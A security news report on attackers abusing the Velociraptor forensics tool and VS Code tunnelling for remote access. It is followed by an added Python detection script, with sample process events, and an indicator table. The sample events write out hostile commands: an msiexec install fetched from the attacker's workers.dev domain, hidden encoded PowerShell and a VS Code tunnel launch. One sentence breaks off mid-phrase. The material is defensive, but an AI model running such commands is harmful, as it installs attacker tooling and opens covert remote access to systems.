In this case, attackers deployed the open-source Velociraptor digital forensics and incident response (DFIR) tool to establish remote access and pave the way for further compromise.
The incident highlights how trusted software can be turned against its users, with a legitimate tool providing cover for malicious activity.
The attack began with the use of the Windows msiexec utility, which downloaded an installer named v2.msi from a Cloudflare Workers domain identified as a staging site for malicious tools.
This installer deployed Velociraptor, a tool typically used by defenders to investigate intrusions, but here repurposed to communicate with a command-and-control server hosted on velo[.]qaubctgg[.]workers[.]dev.
Once installed, attackers executed an encoded PowerShell command to fetch Visual Studio Code from the same domain, running it with its tunnel option enabled.
The tunneling capability in Visual Studio Code, while designed for legitimate development use cases, has been abused in past incidents due to its ability to establish remote connections and enable code execution.
By activating this function, the attackers effectively turned the development environment into a covert channel to their server. To maintain persistence, the adversaries installed the program as a service and redirected its activity to log files.
Shortly after, they downloaded another malicious file named sc.msi, indicating continued staging of tools for later phases of the operation.
The suspicious use of Visual Studio Code tunneling triggered a Taegis
Analysis of the intrusion suggested that the activity would likely have progressed toward ransomware deployment if not disrupted.
The process tree revealed how Velociraptor was abused as the mechanism for launching Visual Studio Code’s tunneling mode, illustrating the attackers’ innovative use of a well-known incident response tool to mask malicious behavior.
Several related threats were identified during the investigation, including malware families detected as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK.
The presence of these indicators suggests that the attackers had already prepared the groundwork for later stages of the campaign, which would have likely included data encryption and extortion.
This incident reflects a concerning shift in attacker methodology, where legitimate tools designed for investigation and response are co-opted as stealthy offensive utilities.
By reducing their reliance on bespoke malware and instead blending with authorized software activity, adversaries improve their chances of evading initial detection.
For defenders, this means that unexpected instances of Velociraptor or anomalous use of Visual Studio Code tunneling should be treated as serious indicators of compromise.
Implementing strong endpoint monitoring, reviewing access to external domains, and practicing disciplined incident response remain essential measures to mitigate the evolving ransomware threat.
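As an added illustration (not code from the article, from Velociraptor or from any EDR product), the following Python runs a detection pass over constructed process-creation events shaped like the chain described above: an msiexec fetch from a remote URL, encoded PowerShell, and code.exe started in tunnel mode, each escalated when Velociraptor sits in the parent chain. The event fields, PIDs, paths and encoded blob are assumptions; only the two workers.dev domains come from the indicator table.

```python
import re
from collections import namedtuple
# One EDR-style process-creation record (constructed shape, not any product's schema).
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Domains from the page's indicator table (defanged there; joined here for matching).
IOC_DOMAINS = ("files.qaubctgg.workers.dev", "velo.qaubctgg.workers.dev")
# Constructed events modelled on the chain above; PIDs, paths and the encoded blob are hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(4100, 2200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://files.qaubctgg.workers.dev/v2.msi /qn"),
    ProcEvent(4200, 400, r"C:\Program Files\Velociraptor\Velociraptor.exe",
              "Velociraptor.exe --config client.config.yaml service run"),
    ProcEvent(4300, 4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"),
    ProcEvent(4400, 4300, r"C:\Users\Public\code\code.exe",
              "code.exe tunnel --accept-server-license-terms --name ws1"),
    ProcEvent(5000, 2200, r"C:\Program Files\Microsoft VS Code\Code.exe",
              r"Code.exe C:\repo"),  # benign interactive use: no tunnel, ordinary parent
]

def has_velociraptor_ancestor(ev, by_pid, max_depth=16):
    # Walk the recorded parent chain (bounded, in case of PID reuse) for Velociraptor.
    cur = by_pid.get(ev.ppid)
    while cur is not None and max_depth > 0:
        if "velociraptor" in cur.image.lower():
            return True
        cur, max_depth = by_pid.get(cur.ppid), max_depth - 1
    return False

def analyze(events):  # -> {pid: [tags]} for events showing behaviours from the reported chain
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        name, cmd, tags = ev.image.rsplit("\\", 1)[-1].lower(), ev.cmdline.lower(), []
        if name == "velociraptor.exe":
            tags.append("velociraptor-present")  # an unexpected DFIR agent is itself an IoC
        if name == "msiexec.exe" and re.search(r"https?://", cmd):
            tags.append("msiexec-remote-package")  # installer fetched straight from a URL
        if name in ("powershell.exe", "pwsh.exe") and re.search(r"\s-e(c|n[a-z]*)?\s", cmd):
            tags.append("encoded-powershell")
        if name == "code.exe" and re.search(r"\btunnel\b", cmd):
            tags.append("vscode-tunnel")  # remote tunnel mode enabled
        if any(d in cmd for d in IOC_DOMAINS):
            tags.append("known-ioc-domain")
        if tags and has_velociraptor_ancestor(ev, by_pid):
            tags.append("velociraptor-ancestor")  # the pivot this incident hinged on
        if tags:
            findings[ev.pid] = tags
    return findings
```

In a real deployment the same rules would be expressed in the EDR's query language and the Velociraptor check keyed to an allowlist of hosts where the agent is expected.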
| Indicator | Type | Context |
|---|---|---|
| files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign |
| velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign |
The post Exploiting Velociraptor – Cyberattackers Use Incident Response Tool for Remote Access appeared first on Cyber Security News.